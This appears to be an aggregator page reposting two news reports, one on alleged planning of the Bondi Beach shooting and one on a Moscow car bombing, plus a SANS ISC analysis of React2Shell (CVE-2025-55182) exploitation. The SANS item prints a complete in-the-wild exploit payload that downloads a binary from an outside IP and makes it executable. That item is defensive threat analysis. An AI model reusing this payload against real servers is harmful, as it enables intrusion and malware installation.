AnonymousMedia.org

Category: Uncategorized

  • Bondi gunmen threw explosives at start of attack and practised shooting weeks before, police allege

    Bondi gunmen threw explosives at start of attack and practised shooting weeks before, police allege


    Helen Livingstone,Sydneyand

    Emily Atkinson

    Supplied A man dressed in black and standing in a field of lush grass aims a shotgunSupplied

    A screenshot from a video found on Naveed Akram’s phone shows his father conducting firearms training, police allege

    The suspected gunmen in the Bondi Beach attack threw explosives at the start of the deadly incident and had practised shooting weeks before as they planned the attack, according to new court documents.

    Fifteen people were killed and dozens more injured when two gunmen opened fire on a Hanukkah celebration on 14 December. Explosives, including a “tennis ball bomb”, failed to detonate, according to the documents.

    Naveed Akram, 24, has been charged with 59 offences, including 15 counts of murder and one of terror. A second gunman – his father, Sajid Akram – was shot dead by police at the scene.

    According to the documents, the pair “meticulously” planned the attack for several months and, two days prior to the shooting, visited Bondi for reconnaissance.

    Supplied Grainy CCTV footage shows a darkened road with cars and two deckchairs on a balcony in the foregroundSupplied

    CCTV shows the Akrams carrying out reconnaissance two days ahead of the Bondi Beach attack, police allege

    Last week, a temporary suppression order was made on the release of the police fact sheet to protect the identities of the survivors. It was revoked on Monday and the documents were published with some redactions.

    Included are the details of several videos tracing the movements of the alleged gunmen in the months, days and hours before the attack.

    One video – taken on one of their mobile phones in October – is described as showing the men sitting in front of an image of an Islamic State group (IS) flag.

    They are heard making statements about their motivations for the attack and condemn “the acts of ‘Zionists’”, police say.

    Naveed Akram is also “recorded appearing to recite, in Arabic, a passage from the Quran”.

    Police said separate footage from October shows the father and son “conducting firearms training in a countryside location”, believed to be in New South Wales. They are seen “firing shotguns and moving in a tactical manner”, officials added.

    CCTV footage from the evening of 12 December is said to show two males “believed to be the accused and his father” in their car next to Bondi Beach.

    “The accused and his father, S Akram, are seen to exit the vehicle and walk along the footbridge, being the same position where they attended two days later and shot at members of the public,” the document states.

    “Police allege that this is evidence of reconnaissance and planning of a terrorist act.”

    Supplied Grainy footage shows two men coming out of a doorway carrying big unidentifiable objects in their arms.Supplied

    A screenshot from CCTV shows the Akrams carrying ‘bulky items’ hours before the attacks, police allege

    At around 02:00 (15:00 GMT) on the day of the attack, two men were captured on CCTV leaving rented accommodation in the Sydney suburb of Campsie “carrying long and bulky items wrapped in blankets”, which they placed into a car.

    The documents note these include two single barrel shotguns, a Beretta rifle, four improvised explosive devices (IEDs) and two IS flags.

    Police say shortly after 17:00 (08:00 GMT), the men were seen leaving the rental. Separate footage captures them arriving at Bondi at 18:50 (09:50 GMT), where they parked and placed the flags on the inside of the front and rear windows.

    They are then seen removing the firearms and IEDs from the car, before walking towards a footbridge, according o the documents.

    It was from this location that police believe they threw the explosives – three pipe bombs and a “tennis ball bomb” – towards the crowd, though none exploded.

    A short time later, they used the firearms to shoot towards the crowd, police say. Fourteen people were killed at the scene. One other died from their injuries later in hospital.

    Sajid Akram was shot and killed during an exchange of fire with New South Wales Police officers,

    Naveed Akram was critically injured by police fire. He was released from hospital on Monday and transferred to a prison.

    Supplied A grainy image shows a white package with red wires coming out of it in the boot of a carSupplied

    Police allege a homemade bomb was found in the boot of the Akrams’ vehicle

    The attack at Bondi Beach sparked calls for tougher restrictions on gun ownership and more efforts to protect the Jewish community from rising antisemitism.

    On Monday, New South Wales state recalled its parliament to debate a raft of new gun and protest laws, proposed in the wake of the shooting.

    Some civil rights groups and pro-gun advocates have raised concerns that the laws will place undue restrictions on firearms and protests.

    NSW Premier Chris Minns said some may feel the changes had “gone too far” but they were needed to keep the community safe.



    Source link

  • Russian general killed by car bomb in Moscow, officials say

    Russian general killed by car bomb in Moscow, officials say


    A Russian general has been killed in a car bombing in Moscow, officials have said.

    Russia’s Investigative Committee said Lt Gen Fanil Sarvarov died on Monday morning after an explosive device planted under a car detonated.

    Sarvarov, 56, was the head of the armed forces’ operational training department, the committee added.

    It said one theory being investigated was that the bomb was planted with the involvement of Ukrainian intelligence services. Ukraine has not commented.

    Investigators have been sent to the scene, in a car park near an apartment block in the south of Russia’s capital.

    Images from the area show a badly damaged white car with the doors blown out, surrounded by other vehicles in a parking lot.

    Since Russia launched its full-scale invasion of Ukraine in February 2022, a number of military officials have been targeted in the Russian capital.

    Gen Yaroslav Moskalik was killed in a car bomb attack in Moscow in April, while Gen Igor Kirillov died in December 2024 when a device hidden in a scooter was detonated remotely.

    A Ukrainian source later told the BBC that Kirillov was killed by Ukraine’s security service, though this was never confirmed on the record. As a matter of policy, Ukraine never officially admits or claims responsibility for targeted attacks.



    Source link

  • More React2Shell Exploits CVE-2025-55182 – SANS ISC

    More React2Shell Exploits CVE-2025-55182 – SANS ISC


    Exploits for React2Shell (CVE-2025-55182) remain active. However, at this point, I would think that any servers vulnerable to the “plain” exploit attempts have already been exploited several times. Here is today’s most popular exploit payload:

    ------WebKitFormBoundaryxtherespoopalloverme

    Content-Disposition: form-data; name="0"


    {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',r=>r.pipe(process.mainModule.require('fs').createWriteStream('/dev/shm/lrt').on('finish',()=>process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));","_formData":{"get":"$1:constructor:constructor"}}}

    ------WebKitFormBoundaryxtherespoopalloverme

    Content-Disposition: form-data; name="1"


    "$@0"

    ------WebKitFormBoundaryxtherespoopalloverme

    ------WebKitFormBoundaryxtherespoopalloverme--

    To make the key components more readable:

    process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',

    r=>r.pipe(process.mainModule.require('fs').

    createWriteStream('/dev/shm/lrt').on('finish'

    This statement downloads the binary from 51.81.104.115 into a local file, /dev/shm/lrt.

    process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));

    And then the script is marked as executable. It is unclear whether the script is explicitly executed. The Virustotal summary is somewhat ambiguous regarding the binary, identifying it as either adware or a miner [1]. Currently, this is the most common exploit variant we see for react2shell. 

    Other versions of the exploit use /dev/lrt and /tmp/lrt instead of /dev/shm/lrt to store the malware.

    /dev/shm and /dev/tmp are typically world writable and should always work. /dev requires root privileges, and these days it is unlikely for a web application to run as root. One recommendation to harden Linux systems is to create/tmp as its own partition and mark it as “noexec” to prevent it from being used as a scratch space to run exploit code. But this is sometimes tough to implement with “normal” processes running code in /tmp (not pretty, but done ever so often)

    [1] https://www.virustotal.com/gui/file/895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b/detection



    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

    Twitter|



    Source link